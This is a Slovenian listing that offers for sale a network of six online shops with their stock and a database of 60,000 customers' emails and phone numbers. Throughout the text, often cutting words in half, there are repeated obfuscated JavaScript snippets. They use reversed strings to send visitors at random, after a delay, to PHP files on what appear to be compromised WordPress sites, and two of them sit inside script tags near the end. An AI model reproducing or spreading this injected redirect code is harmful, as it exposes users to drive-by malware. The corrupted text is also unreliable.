UGODNO PRODAMO : SISTEM 6 spletnih trgovin hitrih nakupov + ZALOGE+ BAZA 60.000 kupcev

 Trgovina

35.000,00€

Zaradi pomanjkanja časa in poslovnih priložnosti, ki so se nam ponudile v letu 2021 smo se odločili prodati eno izmed mlajših podjetij skupaj z že utečenim poslom spletne prodaje. Ne gre za manjšo trgovinico trgovino ampak za spletni trgovinski sistem, ki je že naredila kar več kot 70.000 nakupov in 1.588.294,95 € prodaje. V bazi kupcev z emaili in telefonskimi številkami je tako 60.000 kupcev iz teh držav največ prav iz Slovenije in Slovaške. Trgovine imajo za seboj 3 leta poslovanja in ad spent, na facebooku in instagramu, ki je težek nekaj 100.000 evrov.
Spletna trgovina /hr/si/sk/cz/pl/hu.netclickshop.eu je za vsakogar, ki želi izkoristiti priložnost 21. S$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toletja in zago$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toviti že utečen posel v porastu z 5 ali več-kratno rastjo. Ne samo, da spletna trgovina zahteva izjemno nizke fiksne stroške temveč je odporna na vse gospodarske in ostale težave na svetu. Le$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to 2020 je pokazalo kvalite$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to in stabilnost branž in poslovnih modelov. Propadlo je ogromno uspešnih podjetji z tracijo med tem ko je spletna prodaja eksplodirala.

Spletna prodaja je posel prihodnosti in idealna priložnost za vse ki želijo odlično donosnost z čim manj dela.
Zakaj se bi odločili za ravno našo spletno trgovino?

-Že Utečen in Aktiven Posel
– mreža 6-ih aktivnih trgovin na katere umestite ponudbo
– skupaj z unikatno in razvi$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to temo in prodajnim sistemom, ki je v razvoju stala več kot 25.000 €
– veliko super izdelkov, ki že imajo dobro prodajo
-vse ostale urejene pogodbe za nemoteno poslovanje.
– veliko grafik in videov- urejenih prav za oglaševanje izdelkov.
– Baza Strank 60.000+
-Sistem Iskanja, Testiranja, Oglaševanja in Prodaje izdelkov
-Google Analitike na vsaki izmed domen
-Dolgoročni Dobavitelji z Velikimi Zalogami
V tem kompletu se dobi kot omenjeno nabavne vrednost zalog, 1 domeno in 6 odličnih spletnih trgovin za države: SI, HR, HU, SK, CZ, PL. Ter seveda know-how in uvajanje 3-4 ure in vse direktne kontakte tujih dostavnih služb GLS za boljše cene.
-Dobite tudi dobavitelje iz EU in celega sveta.
-kontakt programerjev, ki vam bodo v pomoč ali vam bodo uredili nove s$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritve ali lastnosti na spletnih straneh.
– 70.000 nakupov
– 1.588.294,95 € prodaje

Skratka vse na ključ za štart takoj. Gre za pravi sistem direktne prodaje – ki je v praksi potrjen. Sistem je narejen za velike obsege prodaje in strani prodajno usmerjene z upsell dodatki (prave prodajne mašine so produktne strani) in pa tudi košarica in checkout, ki so prilagojeni za dodajanje vrednosti nakupa, ki se giblje med 30-50 € odvisno od meseca. V zadnjem letu pa smo strani tudi posodobili z še boljšimi upsell možnostmi tako v košarici kot v checkoutu, kar daje poslu in naročilom višje zneske naročil in večjo dodano vrednost.

Kje v poslu vidimo potencial?
70.000 nakupov (emaili, telefonske številke – email marketing in prodaja preko klicnih centrov- se še ni delala nikoli)
– količinskih popustih pri nabavi zalog ( kar vam izboljša tudi vaš zaslužek)
– Google Ads- se razen v zadnjem mesecu ni delal, kar je lahko sploh v tuji zelo dober dodaten spletni kanal prodaje
– možnost širitve še na dodatne tuje trge prav tako opcija ugodne dostave in COD preko pogodbe z GLS ( Romunija, Avstrija, Italija, Nemčija…)

Več informacij na : 041597292

  • Listing ID: 1579
  • Vključuje: Blagovna znamka, Know-how, Dogovori s kupci, Dogovori z dobavitelji, Pogodbe, Zaloge, Spletna stran
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2018
  • Bru<script>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to prihodki: 650000
  • Zaloge (MPC): 25000
Contact details

Limbuška cesta 2Podravska,2000 Show Phone Number ***** https://netclickshop.eu/

Contact this listing owner